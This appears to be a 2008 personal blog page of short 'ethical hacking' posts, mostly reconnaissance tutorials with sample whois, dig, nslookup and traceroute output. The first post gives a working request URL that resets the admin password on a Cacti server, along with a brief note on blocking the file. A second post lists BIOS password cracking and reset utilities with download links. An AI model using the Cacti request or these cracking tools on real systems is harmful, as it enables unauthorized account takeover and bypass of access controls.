Welcome To suyashjain.blogspot.com

For Latest and more contents visit http://www.i3w.in

Friday, October 17, 2008

Cacti Password Hacking

I have found one password hacking trick which can be used for cacti to
change any user password including admin.

http://xxx.xxx.xxx.xxx/auth_changepassword.php?ref=index.php&action=changepassword&username=admin&password=aaaaaa&confirm=aaaaaa&submit=Save

xxx.xxx.xxx.xxx - ip of cacti server.


This url will provide option to change the password of admin user. if
the same is happening with your cacti also kindly block
auth_changepassword.php file from accessing through web.

Posted by at No comments:

Friday, October 10, 2008

BIOS Blaster and Capture Utilities

 11th Alliance toolkit  =>    Another toolkit containing utilities needed to gain access to a wide range  of BIOS passwords. Download it from  http://www.wheres.com/etc/FatherQuinn/bios310.zip.
 AMIDECOD    =>        This utility will decode BIOS passwords on American Megatrends systems. Get it at http://www.outpost9.com/files/crackers.html.
 AMI Password Viewer   =>      This utility from KORT reads, decrypts, and displays AMI BIOS passwords. Get it at http://www.rat.pp.se/hotel/panik/archive/skw-ami.zip.
  AW.COM     =>   This utility by Falcon n Alex cracks Award BIOS passwords. Get it at http://www.lls.se/~oscar/files/pwd/aw.zip.
  CmosPwd     =>  CmosPwd can retrieve BIOS passwords from many popular computers,including IBM, Compaq, Packard Bell, and Gateway. Download it at   http://www.esiea.fr/public_html/Christophe.GRENIER/index.html?cmospwd.html.
  Kill CMOS   => If a user-defined password already exists on a computer, resetting the CMOS to its default state will erase that password. A utility to do this can be downloaded from http://www.AntiOnline.com/archives/anticode/bios-crackers/killcmos.zip.

Posted by at No comments:

Wednesday, October 01, 2008

Ethical Hacking - Footprinting - SmartWhois

SmartWhois is a windows based GUI version of Whois. It is an
information-gathering program that allows you to find all available
information about an IP address, host name, or domain, including
country, state or province, city,name of the network provider,
administrator, and technical-support contact information.

You can get it from here.

http://www.tamos.com/products/smartwhois/

Posted by at 1 comment:

Ethical Hacking - FootPrinting - Sam Spade

Sam Spade is windows based GUI tool which provide all in one interface for Foot Printing. It includes Ping, DNS, Whois, IP Block info, Dig, Traceroute etc

· Each tool displays it's output in it's own window, and everything is multi-threaded so you don't need to wait for one query to complete before starting the next one
· Some functions are threaded still further to allow lazy reverse DNS lookups (never do a traceroute -n again)
· The output from each query is hotlinked, so you can right click on an email address, IP address, hostname or internic tag to run another query on it
· Appending the results of a query to the log window is a single button function
· There's a lot of online help, in both WinHelp and HTMLHelp formats. This includes tutorials, background information and links to online resources as well as the program manual itself


You can download it from the following location.

http://www.softpedia.com/get/Network-Tools/Network-Tools-Suites/Sam-Spade.shtml
Posted by at No comments:

Ethical Hacking - Foorprinting - Traceroute

traceroute is a command which is available in all OS.

If you the ip domain/ip address of organization , you can trace the gateway devices and ISP details.

Example:

Tracing route to yahoo.com [68.180.206.184]...

hop rtt rtt rtt   ip address domain name
1 8 1 0   70.84.211.97 61.d3.5446.static.theplanet.com
2 0 0 0   70.84.160.162 vl2.dsr02.dllstx5.theplanet.com
3 0 0 0   70.85.127.109 po52.dsr02.dllstx3.theplanet.com
4 0 0 0   70.87.253.21 et3-1.ibr03.dllstx3.theplanet.com
5 0 0 0   70.87.253.178 b2.fd.5746.static.theplanet.com
6 23 21 22   216.115.96.58 so-4-0-0.pat2.dnx.yahoo.com
7 49 49 63   216.115.101.128 as0.pat1.pao.yahoo.com
8 48 47 47   216.115.101.33 ae2.pat2.pao.yahoo.com
9 49 48 48   216.115.107.51 ae0-p141.msr1.sp1.yahoo.com
10 49 48 49   209.131.32.23 te-9-1.bas-a1.sp1.yahoo.com
11 47 47 48   68.180.206.184 w2.rc.vip.sp1.yahoo.com

Trace complete.

Traceroute.org is one of the fantastic site from where you can perform the traceroute through various part of world.

Posted by at No comments:

Ethical Hacking - FootPrinting - DIG

Dig is a linux command which is similor to nslookup command. It also comes under DNS enumeration.

Example:

dig yahoo.com

; <<>> DiG 9.3.3rc2 <<>> yahoo.com

;; global options: printcmd

;; Got answer:

;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 39856

;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 7, ADDITIONAL: 7


;; QUESTION SECTION:

;yahoo.com. IN A


;; ANSWER SECTION:

yahoo.com. 359 IN A 68.180.206.184

yahoo.com. 359 IN A 206.190.60.37


;; AUTHORITY SECTION:

yahoo.com. 52791 IN NS ns4.yahoo.com.

yahoo.com. 52791 IN NS ns5.yahoo.com.

yahoo.com. 52791 IN NS ns6.yahoo.com.

yahoo.com. 52791 IN NS ns8.yahoo.com.

yahoo.com. 52791 IN NS ns1.yahoo.com.

yahoo.com. 52791 IN NS ns2.yahoo.com.

yahoo.com. 52791 IN NS ns3.yahoo.com.


;; ADDITIONAL SECTION:

ns1.yahoo.com. 52959 IN A 66.218.71.63

ns2.yahoo.com. 52959 IN A 68.142.255.16

ns3.yahoo.com. 52959 IN A 217.12.4.104

ns4.yahoo.com. 52959 IN A 68.142.196.63

ns5.yahoo.com. 66635 IN A 119.160.247.124

ns6.yahoo.com. 17127 IN A 202.43.223.170

ns8.yahoo.com. 52790 IN A 202.165.104.22


;; Query time: 2 msec

;; SERVER: 202.71.152.65#53(202.71.152.65)

;; WHEN: Tue Sep 30 19:38:35 2008

;; MSG SIZE rcvd: 297


Different Types of DNS Records

The following list describes the common DNS record types and their use:

A (address)—Maps a host name to an IP address

SOA (Start of Authority)—Identifies the DNS server responsible for the domain information

CNAME (canonical name)—Provides additional names or aliases for the address record

MX (mail exchange)—Identifies the mail server for the domain

SRV (service)—Identifies services such as directory services

PTR (pointer)—Maps IP addresses to host names

NS (name server)—Identifies other name servers for the domain

Posted by at No comments:

Ethical Hacking - Footprinting - NSLOOKUP

nslookup is one of the fantastis tool through which dns enumeration can be performed.

It can provides the following informations.


  1. Ip addresses

  2. Domain names

  3. Sub domain names or computer names

  4. Mail Servers

  5. DNS Server


Sample Output

# nslookup

> set type=mx

> google.com

Server: x.x.x.x

Address: x.x.x.x#53


Non-authoritative answer:

google.com mail exchanger = 10 smtp3.google.com.

google.com mail exchanger = 10 smtp4.google.com.

google.com mail exchanger = 10 smtp1.google.com.

google.com mail exchanger = 10 smtp2.google.com.


Authoritative answers can be found from:

google.com nameserver = ns1.google.com.

google.com nameserver = ns2.google.com.

google.com nameserver = ns3.google.com.

google.com nameserver = ns4.google.com.

ns1.google.com internet address = 216.239.32.10

ns2.google.com internet address = 216.239.34.10

ns3.google.com internet address = 216.239.36.10

ns4.google.com internet address = 216.239.38.10

> exit


online nslookup is also available.

networking.ringofsaturn.com/Tools/nslookup.php

centralops.net/
www.nexperts.org/onlinenslookup.aspx
www.subnetonline.com/pages/network-tools/online-nslookup.php
enc.com.au/itools/nslookup.php
Posted by at No comments:

Ethical Hacking - FootPrinting - Host

Linux host command can also be used to provide a lot of information about domain.

Example:

host yahoo.com

yahoo.com has address 68.180.206.184

yahoo.com has address 206.190.60.37

yahoo.com mail is handled by 1 c.mx.mail.yahoo.com.

yahoo.com mail is handled by 1 d.mx.mail.yahoo.com.

yahoo.com mail is handled by 1 e.mx.mail.yahoo.com.

yahoo.com mail is handled by 1 f.mx.mail.yahoo.com.

yahoo.com mail is handled by 1 g.mx.mail.yahoo.com.

yahoo.com mail is handled by 1 a.mx.mail.yahoo.com.

yahoo.com mail is handled by 1 b.mx.mail.yahoo.com.

Posted by at No comments:

Ethical Hacking - FootPrinting - WHOIS

Whois searches the Internet for domain name administration details, such as domain ownership, address, location, phone number, dns servers and so on, about a specific domain name.

Whois tool is available in all linux OS as well as other OS also. Whois is also availabe online.

Example:

whois eccouncil.org

[Querying whois.publicinterestregistry.net]

[whois.publicinterestregistry.net]

NOTICE: Access to .ORG WHOIS information is provided to assist persons in

determining the contents of a domain name registration record in the Public Interest Registry

registry database. The data in this record is provided by Public Interest Registry

for informational purposes only, and Public Interest Registry does not guarantee its

accuracy. This service is intended only for query-based access. You agree

that you will use this data only for lawful purposes and that, under no

circumstances will you use this data to: (a) allow, enable, or otherwise

support the transmission by e-mail, telephone, or facsimile of mass

unsolicited, commercial advertising or solicitations to entities other than

the data recipient's own existing customers; or (b) enable high volume,

automated, electronic processes that send queries or data to the systems of

Registry Operator or any ICANN-Accredited Registrar, except as reasonably

necessary to register domain names or modify existing registrations. All

rights reserved. Public Interest Registry reserves the right to modify these terms at any

time. By submitting this query, you agree to abide by this policy.


Domain ID:D81180127-LROR

Domain Name:ECCOUNCIL.ORG

Created On:14-Dec-2001 10:13:06 UTC

Last Updated On:22-Jul-2008 13:44:54 UTC

Expiration Date:14-Dec-2014 10:13:06 UTC

Sponsoring Registrar:Tucows Inc. (R11-LROR)

Status:OK

Registrant ID:tudWNRx8nZtFHrvG

Registrant Name:Technical Support

Registrant Organization:EC-Council

Registrant Street1:3819 Osuna Rd NE

Registrant Street2:

Registrant Street3:

Registrant City:Albuquerque

Registrant State/Province:NM

Registrant Postal Code:87109

Registrant Country:US

Registrant Phone:+1.2127098253

Registrant Phone Ext.:

Registrant FAX:

Registrant FAX Ext.:

Registrant Email:info@eccouncil.org

Admin ID:tu5CH8cTqPzxTAEi

Admin Name:Technical Support

Admin Organization:EC-Council

Admin Street1:3819 Osuna Rd NE

Admin Street2:

Admin Street3:

Admin City:Albuquerque

Admin State/Province:NM

Admin Postal Code:87109

Admin Country:US

Admin Phone:+1.2127098253

Admin Phone Ext.:

Admin FAX:

Admin FAX Ext.:

Admin Email:info@eccouncil.org

Tech ID:tu8jivUXxCudWa9J

Tech Name:Technical Support

Tech Organization:EC-Council

Tech Street1:3819 Osuna Rd NE

Tech Street2:

Tech Street3:

Tech City:Albuquerque

Tech State/Province:NM

Tech Postal Code:87109

Tech Country:US

Tech Phone:+1.2127098253

Tech Phone Ext.:

Tech FAX:

Tech FAX Ext.:

Tech Email:info@eccouncil.org

Name Server:AUTH1.NS.NYI.NET

Name Server:AUTH2.NS.NYI.NET

Name Server:

Name Server:

Name Server:

Name Server:

Name Server:

Name Server:

Name Server:

Name Server:

Name Server:

Name Server:

Name Server:


Online Whois Query Sites:
networking.ringofsaturn.com/Tools/whois.php
www.arin.net/whois/
whois.domaintools.com/
www.onlinewhois.org/
www.subnetonline.com/pages/network-tools/online-whois.php
www.whoistheowner.net/
samspade.org/
network-tools.com/
http://centralops.net/co/
Posted by at No comments:
Subscribe to: Posts (Atom)